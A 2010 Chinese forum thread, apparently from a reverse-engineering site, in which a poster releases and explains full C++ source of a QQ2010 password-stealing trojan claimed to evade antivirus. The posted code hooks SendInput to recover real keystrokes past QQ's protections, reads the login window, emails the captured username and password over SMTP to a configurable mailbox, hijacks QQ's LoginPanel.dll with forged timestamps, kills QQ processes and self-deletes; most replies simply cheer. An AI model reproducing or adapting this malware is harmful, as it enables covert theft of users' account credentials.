首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 付费问答
    3. 发新帖
[旧帖] [原创]刚写完的QQ2010木马源码,绝对免杀(以加上讲解) 0.00雪花
发表于: 2010-11-1 17:45 12378

[旧帖] [原创]刚写完的QQ2010木马源码,绝对免杀(以加上讲解) 0.00雪花

hmxiaowu 活跃值
2010-11-1 17:45
12378
.

回复的人多,我就发全部源码!

代码已经全部贴上,请往下看

代码没给大家 讲解,不知道看懂没。
所以,现在我原理给大家说一下,腾讯QQ 安装了两个钩子一个是WH_DEBUG,还有一个是WH_KEYBOARD_LL,当QQ的密码框获得焦点的时候DEBUG钩子就开始用SendInput发送乱码,在QQ启动的时候也会先调用SendInput发送一个乱码,所以就挂钩SendInput 这个函数,我们正确安装按键的时候QQ会通过WH_KERBOARD_LL低级钩子,发送一个错误的按键信息,在这里通过分析,发现在WIN7系统上 真实的按键的就在0x12faa0处记录着,挂钩之后判断一下来源,if(nRetAddress!=0x74F3&&nRetAddress!=0x7374) ,就排除不是真实按键调用的,当然上面这句我们是WIn7上的地址,所有有朋友说,在XP上不行,由于我是WIN7的系统,还没装XP的虚拟机,所以并没添加这个判断,传进来的pInputs等我们基本上就不用去管他,然后通过if(pInputs->ki.dwFlags==0)
判断是否是键盘按下,如果是按下,我们就开始记录。
DWORD nRetAddress=0;
        _asm
        {
                mov eax,0
                mov ax,[ebp+4]
                mov nRetAddress,eax
        }
if(nRetAddress!=0x74F3&&nRetAddress!=0x7374)
这就是取得是什么地方在调用SendInput.
char key=0;
                _asm
                {
                        mov ebx,0x12faa0
                        mov eax,0
                        mov al,[ebx]
                        mov key,al
                }
获取真实的按键,稍后我换上XP系统后,会将这个几个关键西方的发出,大家就可以在XP上也能使用这个木马了。

有人会问为什么我 的文件是User32Hook.cpp 实际挂钩的是SendInput,这个是因为,我用OD分析的时候发现在User32.dll中有一个固定地址 通过[ebp+c]之后也可以获取到 键盘按下的真实按键信息,只要挂钩在那里,也是可以获得真确的按键信息,然后写出木马,并且可以早于QQ的WH_KEYBOARD_LL钩子获取真实按键,就算QQ在WH_KEYBOARD_LL把 WIN7下地址为0x12faa0的真实按键信息清0,也是没有用的,兴趣的朋友,就在 WH_KEYBOARD_LL上下段,然后往上跟就会看到了。只是这样挂钩USER32.dll的时候光写这个DLL了,就得去修改QQ.EXE文件,修改QQEXE后,他有个自身文件的验证,可以通过修改输入表,替换掉CreateFileW 改变打开的文件,而绕过他的文件验证保护,在首地址写入,加载DLL的代码,立马挂钩USER32.DLL,然后恢复QQ的OEP地址的内存,从新回到QQ的OEP,这样就可以在QQ输入密码的时候早于QQ获得,也不用在挂钩SendInput,后来我发现WH_KEYBOARD_LL钩子中当真实的按键按下时,他也会去调用SendInput虽然是错的按键,但是我们可以通过0x12faa0获得真实的按键,所以我就改写了,代码,这样看起来更简单。其他的我就不多说,有兴趣的朋友,在分析把!

代码在后面,我会陆续全部贴上

#include <windows.h>
#include <stdio.h>
#include <WinAble.h>

#pragma comment(lib,"User32.lib")
#include "User32Hook.h"

char g_Password[100]={0};
int g_KeyIndex=0;
BYTE g_OldFunc[8];
BYTE g_NewFunc[8];
FARPROC g_lpHookFunc;

BYTE g_NewFunc2[8]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
DWORD g_lpHookFunc2;


char asciiKey1[]={
	'~','1','2','3','4','5','6','7','8','9','0','-','=',
	'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
	'[',']','\\',';','\'',',','.','/',
	'0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
char asciiKey2[]={
	'~','1','2','3','4','5','6','7','8','9','0','-','=',
	'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
	'[',']','\\',';','\'',',','.','/',
	'0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
unsigned int asciiTbl[]={
	0xFFFFFFC0,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0xFFFFFFBD,0xFFFFFFBB,
	0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,
	0xFFFFFFDB,0xFFFFFFDD,0xFFFFFFDC,0xFFFFFFBA,0xFFFFFFDE,0xFFFFFFBC,0xFFFFFFBE,0xFFFFFFBF,
	0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6D,0x6E,0x6F
};


UINT WINAPI XwSendInput(UINT nInputs,LPINPUT pInputs,int cbSize)
{
	DWORD nRetAddress=0;
	_asm
	{
		mov eax,0
		mov ax,[ebp+4]
		mov nRetAddress,eax
	}
	UINT nRet=0;
	HookOff();
	nRet=SendInput(nInputs,pInputs,cbSize);
	HookOn();

	if(nRetAddress!=0x74F3&&nRetAddress!=0x7374)
	{
		char key=0;
		_asm
		{
			mov ebx,0x12faa0
			mov eax,0
			mov al,[ebx]
			mov key,al
		}
		POINT point;
		::GetCaretPos(&point);
		int postion=point.x/8;
	
		if(pInputs->ki.dwFlags==0)
		{
			for(int i=0;i<63;i++)
			{
				if(GetKeyState(VK_NUMLOCK)==0&&i>(63-15))
					break;
				if(asciiTbl[i]==key)
				{
					if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)!=0)||GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)==0)
					{
						if(postion<g_KeyIndex)
						{
							for(int k=g_KeyIndex;k>=postion;k--)
							{
								g_Password[k+1]=g_Password[k];
							}
							g_Password[postion]=asciiKey1[i];
							g_KeyIndex++;
						}
						else
							g_Password[g_KeyIndex++]=asciiKey1[i];
					}
					if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)==0)||(GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)!=0))
					{
						if(postion<g_KeyIndex)
						{
							for(int k=g_KeyIndex;k>=postion;k--)
							{
								g_Password[k+1]=g_Password[k];
							}
							g_Password[postion]=asciiKey2[i];
							g_KeyIndex++;
						}
						else
							g_Password[g_KeyIndex++]=asciiKey2[i];
					}
				}
			}
			if(key==0x8)
			{
				if(g_KeyIndex>0)
				{
					g_Password[g_KeyIndex]=0;
					g_Password[--g_KeyIndex]=0;
				}
			}
		}
	}
	return nRet;
}

void InitHookCallBack()
{
	g_lpHookFunc=GetProcAddress(GetModuleHandle("user32.dll"),"SendInput");
	g_NewFunc[0]=0xe9;

	memcpy(g_OldFunc,(char*)g_lpHookFunc,5);
	DWORD *pNewFuncAddress=(DWORD*)&g_NewFunc[1];

	*pNewFuncAddress=(DWORD)((FARPROC)XwSendInput)-((DWORD)g_lpHookFunc)-5;
}

void HookOn()
{
	DWORD dwOleFlag;
	WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_NewFunc,5,&dwOleFlag);
}

void HookOff()
{
	DWORD dwNewFlag;
	WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_OldFunc,5,&dwNewFlag);
}


程序在附件中

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

上传的附件:
收藏
免费 0
支持
分享
最新回复 (146)
hoyer
雪    币: 3480
活跃值: (246)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
2
贴源码瞅瞅吧。
2010-11-1 18:25
0
prober
雪    币: 35
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
鼎……
2010-11-1 18:26
0
binarystar
雪    币: 251
活跃值: (77)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
私信
4
看到红头文字。。先不管三七二十一来回复一下。。开源是好事。。顶!!!!!!!
2010-11-1 18:27
0
azilljy
雪    币: 20
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
谢谢LZ分享,向LZ学习
2010-11-1 19:03
0
何厚铧
雪    币: 12
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
这个太厉害啦。
2010-11-1 19:30
0
pqqop
雪    币: 21
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
............不懂,顶一个!
2010-11-1 19:34
0
hackroad
雪    币: 4373
活跃值: (3596)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
这个太厉害啦....
2010-11-1 19:35
0
odile
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
支持原创。。。顶
2010-11-1 20:08
0
枫叶飘
雪    币: 37
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
这个需要顶!
2010-11-1 20:18
0
邹志勇
雪    币: 196
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
11
看看代码的质量如何~
2010-11-1 20:27
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
12
.

回复的人,我就慢慢,把全部代码贴完

  木马dll函数的 main.cpp文件的代码
#include <Windows.h>
#include <stdio.h>
#include "User32Hook.h"
#include "SendMail.h"

#pragma comment(linker,"/export:DllCanUnloadNow=Command.DllCanUnloadNow")
#pragma comment(linker,"/export:DllGetClassObject=Command.DllGetClassObject")
#pragma comment(linker,"/export:DllMain=Command.DllMain")
#pragma comment(linker,"/export:DllRegisterServer=Command.DllRegisterServer")
#pragma comment(linker,"/export:DllUnregisterServer=Command.DllUnregisterServer")

HWND hLoginWindow,hUserName,hUserPwd;
char g_UserName[100]={0};
char g_Version[100]={0};

void WaitLoginWindow()
{
	Sleep(1500);
	while(true)
	{
		hLoginWindow=GetForegroundWindow();
		POINT pni;
		RECT rcWindow;

		GetWindowRect(hLoginWindow,&rcWindow);

		pni.y=rcWindow.top+115;
		pni.x=rcWindow.left+100;
		hUserName=WindowFromPoint(pni);

		pni.y=rcWindow.top+155;
		pni.x=rcWindow.left+100;
		hUserPwd=WindowFromPoint(pni);

		LONG lStyle = ::GetWindowLong(hUserPwd, GWL_STYLE);
		if(lStyle & ES_PASSWORD)
			break;

		Sleep(100);
	}
}

DWORD WINAPI ServerThreadProc(LPVOID lpParameter)
{
	memset(g_Password,0,100);
	WaitLoginWindow();
	SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)g_UserName);
	SendMessage(hLoginWindow,WM_GETTEXT,100,(LPARAM)g_Version);

	while(true)
	{
		char tempAccounts[100];
		::SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)tempAccounts);
		if(strcmp(g_UserName,tempAccounts)!=0&&strlen(tempAccounts)!=0)
			strcpy(g_UserName,tempAccounts);

		LONG lStyle = ::GetWindowLong(hUserPwd, GWL_STYLE);
		if((lStyle & ES_PASSWORD)==0)
			break;
		Sleep(100);
	}

	char szContext[64]={0};
	sprintf(szContext,"QQ版本:%s\r\n用户名:%s\r\n密  码:%s\r\n",g_Version,g_UserName,g_Password);

	SMTPINFO smtpinfo;
	strcpy(smtpinfo.SmtpSrvName,"AAAAAAAAAAAAAAAAAAAA");
	strcpy(smtpinfo.Port,"25");
	strcpy(smtpinfo.UserName,"BBBBBBBBBBBBBBBBBBBB");
	strcpy(smtpinfo.Password,"CCCCCCCCCCCCCCCCCCCC");
	strcpy(smtpinfo.From,"DDDDDDDDDDDDDDDDDDDD");
	strcpy(smtpinfo.To,"EEEEEEEEEEEEEEEEEEEE");
	strcpy(smtpinfo.Subject,"*☆‰小五※*提醒-获取到新的QQ!");
	strcpy(smtpinfo.Msg,szContext);

	SendMail(&smtpinfo);

	return 0;
}

BOOL WINAPI DllMain(__in void * _HDllHandle, __in unsigned _Reason, __in_opt void * _Reserved)
{
	switch(_Reason)
	{
		case DLL_PROCESS_ATTACH:
			InitHookCallBack();
			HookOn();
			CreateThread(NULL,0,ServerThreadProc,0,0,0);
			break;
		case DLL_PROCESS_DETACH:
			break;
	}
	return TRUE;
}
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
	return 0;
}
2010-11-1 20:35
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
13
User32Hook.h 文件的代码

void HookOff();
void HookOn();
void InitHookCallBack();

extern char g_Password[100];
2010-11-1 20:43
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
14
SendMail.h文件

typedef struct _SMTPINFO
{
	char SmtpSrvName[32];
	char Port[7];
	char UserName[16];
	char Password[16];
	char From[32];
	char To[32];
	char Subject[32];
	char Msg[64];
}SMTPINFO;

//将用户名和密码转换为base64编码
void Base64(unsigned char *chasc,unsigned char *chuue); 
int Talk(SOCKET sockid, const char *OkCode, char *pSend);
int SendMail(const SMTPINFO *psmtpinfo);
2010-11-1 20:44
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
15
SendMail.cpp文件中的代码
#include <winsock2.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include "SendMail.h"

#pragma comment(lib,"ws2_32.lib")

const int buflen = 256;
char buf[buflen];
int i,userlen,passlen;


//---------------------------------------------------------------------
int SendMail(const SMTPINFO *psmtpinfo)
{
	//准备网络连接
	WSADATA wsadata;

	if (WSAStartup(MAKEWORD(2,2),&wsadata) != 0)
	{
		return 1;
	}

	//创建套接字
	SOCKET sockid;

	if ((sockid = socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
	{
		WSACleanup();
		return 1;
	}

	//得到smtp服务器ip
	struct hostent *phostent = gethostbyname(psmtpinfo->SmtpSrvName);
	struct sockaddr_in addr;

	CopyMemory(&addr.sin_addr.S_un.S_addr,
	phostent->h_addr_list[0],
	sizeof(addr.sin_addr.S_un.S_addr));

	addr.sin_family = AF_INET;
	addr.sin_port = htons(atoi(psmtpinfo->Port));
	ZeroMemory(&addr.sin_zero, 8);

	//连接服务器
	if (connect(sockid, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == SOCKET_ERROR)
	{
		goto STOP;
	}

	if (Talk(sockid, "220", "EHLO sjdf"))
	{
		goto STOP;
	}

	if (Talk(sockid, "250", "AUTH LOGIN"))
	{
		goto STOP;
	}


	ZeroMemory(buf, buflen);

	userlen = lstrlen(psmtpinfo->UserName);
	passlen = lstrlen(psmtpinfo->Password);

	for(i = 0; i < (userlen%3?userlen/3+1:userlen/3); i++)
	{
		Base64((unsigned char * )(psmtpinfo->UserName + i * 3),(unsigned char * )( buf + i * 4));
	}

	if (Talk(sockid, "334", buf))
	{
		goto STOP;
	}

	ZeroMemory(buf, buflen);

	for(i = 0; i < (passlen%3?passlen/3+1:passlen/3); i++)
	{
		Base64((unsigned char *)(psmtpinfo->Password + i * 3),(unsigned char * ) (buf + i * 4));
	}

	if (Talk(sockid, "334", buf))
	{
		goto STOP;
	}

	ZeroMemory(buf, buflen);
	wsprintf(buf, "MAIL FROM:<%s>", psmtpinfo->From);

	if (Talk(sockid, "235", buf))
	{
		goto STOP;
	}

	ZeroMemory(buf, buflen);
	wsprintf(buf, "RCPT TO:<%s>", psmtpinfo->To);

	if (Talk(sockid, "250", buf))
	{
		goto STOP;
	}

	if (Talk(sockid, "250", "DATA"))
	{
		goto STOP;
	}

	ZeroMemory(buf, buflen);
	wsprintf(buf, "TO: %s\r\nFROM: %s\r\nSUBJECT: %s\r\n\r\n%s\r\n.",
		psmtpinfo->To,psmtpinfo->From,psmtpinfo->Subject,psmtpinfo->Msg);
	if (Talk(sockid, "354", buf))
	{
		goto STOP;
	}

	if (Talk(sockid, "250", "QUIT"))
	{
		goto STOP;
	}

	if (Talk(sockid, "221", ""))
	{
		goto STOP;
	}
	else
	{
		closesocket(sockid);
		WSACleanup();
		return 0;
	}

STOP:
	closesocket(sockid);
	WSACleanup();
	return 1;
}
//---------------------------------------------------------------------
int Talk(SOCKET sockid, const char *OkCode, char *pSend)
{
	const int buflen = 256;
	char buf[buflen];
	ZeroMemory(buf, buflen);

	//接收返回信息
	if (recv(sockid, buf, buflen, 0) == SOCKET_ERROR)
	{
		return 1;
	}
	if (strstr(buf, OkCode) == NULL)
	{
		return 1;
	}

	//发送命令
	if (lstrlen(pSend))
	{
		ZeroMemory(buf, buflen);
		wsprintf(buf, "%s\r\n", pSend);

		typedef int (*MySend)(SOCKET,const char*,int,int);
		
		HMODULE hModule=LoadLibrary("Ws2_32.dll");
		MySend mySend=(MySend)GetProcAddress(hModule,"send");

		WSABUF DataBuf;
		DataBuf.len=lstrlen(buf);
		DataBuf.buf=buf;

		DWORD dwS;
		if(WSASend(sockid,&DataBuf,1,&dwS,0,0,0))
		//if (mySend(sockid, buf, lstrlen(buf), 0) == SOCKET_ERROR)
		{
			return 1;
		}
	}

	return 0;
}
//---------------------------------------------------------------------
//Base64编码,chasc:未编码的二进制代码,chuue:编码过的Base64代码
//将用户名和密码转换为base64编码
void Base64(unsigned char *chasc,unsigned char *chuue)
{
	int i,k=2;
	unsigned char t = 0;

	for(i=0;i<3;i++)
	{

		*(chuue+i)=*(chasc+i)>>k;
		*(chuue+i)|=t;
		t=*(chasc+i)<<(8-k);
		t>>=2;
		k+=2;
	}

	*(chuue+3)=*(chasc+2)&63;

	for(i=0;i<4;i++)

		if((*(chuue+i)>=0)&&(*(chuue+i)<=25)) *(chuue+i)+=65;

		else if((*(chuue+i)>=26)&&(*(chuue+i)<=51)) *(chuue+i)+=71;

		else if((*(chuue+i)>=52)&&(*(chuue+i)<=61)) *(chuue+i)-=4;

		else if(*(chuue+i)==62) *(chuue+i)=43;

		else if(*(chuue+i)==63) *(chuue+i)=47;
}
2010-11-1 20:44
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
16
.

User32Hook.cpp 文件的代码,这里便是怎么获取到QQ密码的地方.

#include <windows.h>
#include <stdio.h>
#include <WinAble.h>

#pragma comment(lib,"User32.lib")
#include "User32Hook.h"

char g_Password[100]={0};
int g_KeyIndex=0;
BYTE g_OldFunc[8];
BYTE g_NewFunc[8];
FARPROC g_lpHookFunc;

BYTE g_NewFunc2[8]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
DWORD g_lpHookFunc2;


char asciiKey1[]={
	'~','1','2','3','4','5','6','7','8','9','0','-','=',
	'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
	'[',']','\\',';','\'',',','.','/',
	'0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
char asciiKey2[]={
	'~','1','2','3','4','5','6','7','8','9','0','-','=',
	'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
	'[',']','\\',';','\'',',','.','/',
	'0','1','2','3','4','5','6','7','8','9','*','+','-','.','*'
};
unsigned int asciiTbl[]={
	0xFFFFFFC0,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0xFFFFFFBD,0xFFFFFFBB,
	0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,
	0xFFFFFFDB,0xFFFFFFDD,0xFFFFFFDC,0xFFFFFFBA,0xFFFFFFDE,0xFFFFFFBC,0xFFFFFFBE,0xFFFFFFBF,
	0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6D,0x6E,0x6F
};


UINT WINAPI XwSendInput(UINT nInputs,LPINPUT pInputs,int cbSize)
{
	DWORD nRetAddress=0;
	_asm
	{
		mov eax,0
		mov ax,[ebp+4]
		mov nRetAddress,eax
	}
	UINT nRet=0;
	HookOff();
	nRet=SendInput(nInputs,pInputs,cbSize);
	HookOn();

	if(nRetAddress!=0x74F3&&nRetAddress!=0x7374)
	{
		char key=0;
		_asm
		{
			mov ebx,0x12faa0
			mov eax,0
			mov al,[ebx]
			mov key,al
		}
		POINT point;
		::GetCaretPos(&point);
		int postion=point.x/8;
	
		if(pInputs->ki.dwFlags==0)
		{
			for(int i=0;i<63;i++)
			{
				if(GetKeyState(VK_NUMLOCK)==0&&i>(63-15))
					break;
				if(asciiTbl[i]==key)
				{
					if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)!=0)||GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)==0)
					{
						if(postion<g_KeyIndex)
						{
							for(int k=g_KeyIndex;k>=postion;k--)
							{
								g_Password[k+1]=g_Password[k];
							}
							g_Password[postion]=asciiKey1[i];
							g_KeyIndex++;
						}
						else
							g_Password[g_KeyIndex++]=asciiKey1[i];
					}
					if((GetKeyState(VK_CAPITAL)==1&&GetAsyncKeyState(VK_SHIFT)==0)||(GetKeyState(VK_CAPITAL)==0&&GetAsyncKeyState(VK_SHIFT)!=0))
					{
						if(postion<g_KeyIndex)
						{
							for(int k=g_KeyIndex;k>=postion;k--)
							{
								g_Password[k+1]=g_Password[k];
							}
							g_Password[postion]=asciiKey2[i];
							g_KeyIndex++;
						}
						else
							g_Password[g_KeyIndex++]=asciiKey2[i];
					}
				}
			}
			if(key==0x8)
			{
				if(g_KeyIndex>0)
				{
					g_Password[g_KeyIndex]=0;
					g_Password[--g_KeyIndex]=0;
				}
			}
		}
	}
	return nRet;
}

void InitHookCallBack()
{
	g_lpHookFunc=GetProcAddress(GetModuleHandle("user32.dll"),"SendInput");
	g_NewFunc[0]=0xe9;

	memcpy(g_OldFunc,(char*)g_lpHookFunc,5);
	DWORD *pNewFuncAddress=(DWORD*)&g_NewFunc[1];

	*pNewFuncAddress=(DWORD)((FARPROC)XwSendInput)-((DWORD)g_lpHookFunc)-5;
}

void HookOn()
{
	DWORD dwOleFlag;
	WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_NewFunc,5,&dwOleFlag);
}

void HookOff()
{
	DWORD dwNewFlag;
	WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_OldFunc,5,&dwNewFlag);
}
2010-11-1 20:46
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
17
用来安装DLL文件的代码

#include <windows.h>
#include <stdio.h>
#include <Shlwapi.h>
#pragma comment(lib,"Shlwapi.lib")
#include <Tlhelp32.h>
#include <WinAble.h>

#include "resource.h"

char g_data1[100]="aaaaaaaaaaaaaaaaaaaa";
char g_data2[100]="bbbbbbbbbbbbbbbbbbbb";
char g_data3[100]="cccccccccccccccccccc";
char g_data4[100]="dddddddddddddddddddd";
char g_data5[100]="eeeeeeeeeeeeeeeeeeee";

CHAR szPath[1024]={0};
DWORD dwIsQQ=0;

int GetQQPath(LPSTR lpPath)
{
	if(PathIsDirectory("C:\\Program Files\\Tencent\\QQ\\Bin"))
	{
		strcpy(szPath,"C:\\Program Files\\Tencent\\QQ\\Bin\\");
		dwIsQQ=1;
		return true;
	}
	else if(PathIsDirectory("D:\\Program Files\\Tencent\\QQ\\Bin"))
	{
		strcpy(szPath,"D:\\Program Files\\Tencent\\QQ\\Bin\\");
		dwIsQQ=1;
		return true;
	}
	else if(PathIsDirectory("E:\\Program Files\\Tencent\\QQ\\Bin"))
	{
		strcpy(szPath,"E:\\Program Files\\Tencent\\QQ\\Bin\\");
		dwIsQQ=1;
		return true;
	}
	else if(PathIsDirectory("F:\\Program Files\\Tencent\\QQ\\Bin"))
	{
		strcpy(szPath,"F:\\Program Files\\Tencent\\QQ\\Bin\\");
		dwIsQQ=1;
		return true;
	}
	WIN32_FIND_DATA FindFileData;
	HANDLE hFind;
	CHAR szDir[512];
	strcpy(szDir,lpPath);
	if(szDir[strlen(szDir)-1]!='\\')
		strcat(szDir,"\\");
	strcat(szDir,"*.*");
	hFind = ::FindFirstFile(szDir, &FindFileData);
	if(hFind==INVALID_HANDLE_VALUE)
		return 0;
	do 
	{
		if(FindFileData.dwFileAttributes>=16&&FindFileData.dwFileAttributes<=22)
		{
			if(FindFileData.cFileName[0]!='.'&&stricmp("Windows",FindFileData.cFileName)!=0)
			{
				strcpy(szDir,lpPath);
				if(szDir[strlen(szDir)-1]!='\\')
					strcat(szDir,"\\");
				strcat(szDir,FindFileData.cFileName);
				GetQQPath(szDir);
			}
		}
		else if(stricmp("QQ.exe",FindFileData.cFileName)==0)
		{

			if(lpPath[strlen(lpPath)-1]!='\\')
				strcat(lpPath,"\\");
			strcpy(szPath,lpPath);
			dwIsQQ=1;
			return 1;
		}
	} while (::FindNextFileA(hFind,&FindFileData));
	return 0;
}

void WriteData(HANDLE hFile)
{
	LONG dwAddress=0;
	DWORD dwWrite;

	dwAddress=0x177C;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,g_data1,20,&dwWrite,NULL);

	dwAddress=0x1798;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,g_data2,20,&dwWrite,NULL);

	dwAddress=0x17B0;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,g_data3,20,&dwWrite,NULL);

	dwAddress=0x17C8;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,g_data4,20,&dwWrite,NULL);

	dwAddress=0x17E0;
	SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
	WriteFile(hFile,g_data5,20,&dwWrite,NULL);

	char szDllPath2[1000];
	strcpy(szDllPath2,szPath);
	strcat(szDllPath2,"LoginPanel.dll");

	HANDLE hFileTime=CreateFile(szDllPath2,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);

	FILETIME time;
	GetFileTime(hFileTime,NULL,NULL,&time);
	SetFileTime(hFile,&time,&time,&time);

	CloseHandle(hFile);
	CloseHandle(hFileTime);
}


bool InsertQQDirectory()
{
	HRSRC hRsrc=::FindResource(NULL,MAKEINTRESOURCE(IDR_DLL2),"DLL");
	HGLOBAL hGlobal=::LoadResource(NULL,hRsrc);
	LPVOID lpVoid=::LockResource(hGlobal);
	DWORD dwSize=::SizeofResource(NULL,hRsrc);
	CHAR szDriver[512]={0};
	for(int i=0;i<26;i++)
	{
		szDriver[0]='B'+i;
		szDriver[1]=':';
		szDriver[2]='\\';
		dwIsQQ=0;
		DWORD dwType=::GetDriveType(szDriver);
		if(dwType==DRIVE_NO_ROOT_DIR)
			continue;
		GetQQPath(szDriver);
		if(dwIsQQ==1)
		{	
			char szDllPath[1000];
			char szOlePath[1000];
			char szNewPath[1000];

			strcpy(szOlePath,szPath);
			strcat(szOlePath,"LoginPanel.dll");
			strcpy(szNewPath,szPath);
			strcat(szNewPath,"command.dll");
		
			if(GetFileType(szNewPath)!=FILE_TYPE_UNKNOWN)
				return true;
			
			CopyFile(szOlePath,szNewPath,TRUE);
			CopyFile(szOlePath,szNewPath,TRUE);

			strcpy(szDllPath,szPath);
			strcat(szDllPath,"LoginPanel.dll");

			HANDLE hFile=::CreateFile(szDllPath,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,
				NULL,CREATE_ALWAYS,0,NULL);
			DWORD dwWriteByte;
			if(hFile!=NULL)
				::WriteFile(hFile,lpVoid,dwSize,&dwWriteByte,NULL);

			WriteData(hFile);
			
			return true;
		}
	}
	return false;
}

void CloseAllQQProcess()
{
	while (true)
	{
		HWND hwnd=FindWindow("TXGuiFoundation",NULL);
		SendMessage(hwnd,WM_CLOSE,0,0);
		PostMessage(hwnd,WM_CLOSE,0,0);
		SendMessage(hwnd,WM_DESTROY,0,0);
		PostMessage(hwnd,WM_DESTROY,0,0);
		SendMessage(hwnd,WM_CHAR,VK_RETURN,0);
		PostMessage(hwnd,WM_CHAR,VK_RETURN,0);
		Sleep(10);
		if(hwnd==NULL)
			break;
	}
}

void SelfDelete(void)
{
	char lpBuffer[MAX_PATH], lpFilename[MAX_PATH], lpCmdLine[MAX_PATH];
	GetEnvironmentVariable("ComSpec", lpBuffer, MAX_PATH);
	GetModuleFileName(NULL, lpFilename, MAX_PATH);
	sprintf(lpCmdLine, "%s /c del \"%s\"", lpBuffer, lpFilename);
	WinExec(lpCmdLine, SW_HIDE);
}


int WINAPI WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in_opt LPSTR lpCmdLine, __in int nShowCmd )
{
	CloseAllQQProcess();
	InsertQQDirectory();
	SelfDelete();
	return 0;
}
2010-11-1 20:47
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
18
配置器中的 主要函数代码

void CConfigureSetupDlg::WriteData()
{
	HRSRC hRsrc=::FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"EXE");
	HGLOBAL hGlobal=::LoadResource(NULL,hRsrc);
	LPVOID lpVoid=::LockResource(hGlobal);
	DWORD dwSize=::SizeofResource(NULL,hRsrc);

	char szDllPath[1000];
	GetCurrentDirectory(1000,szDllPath);
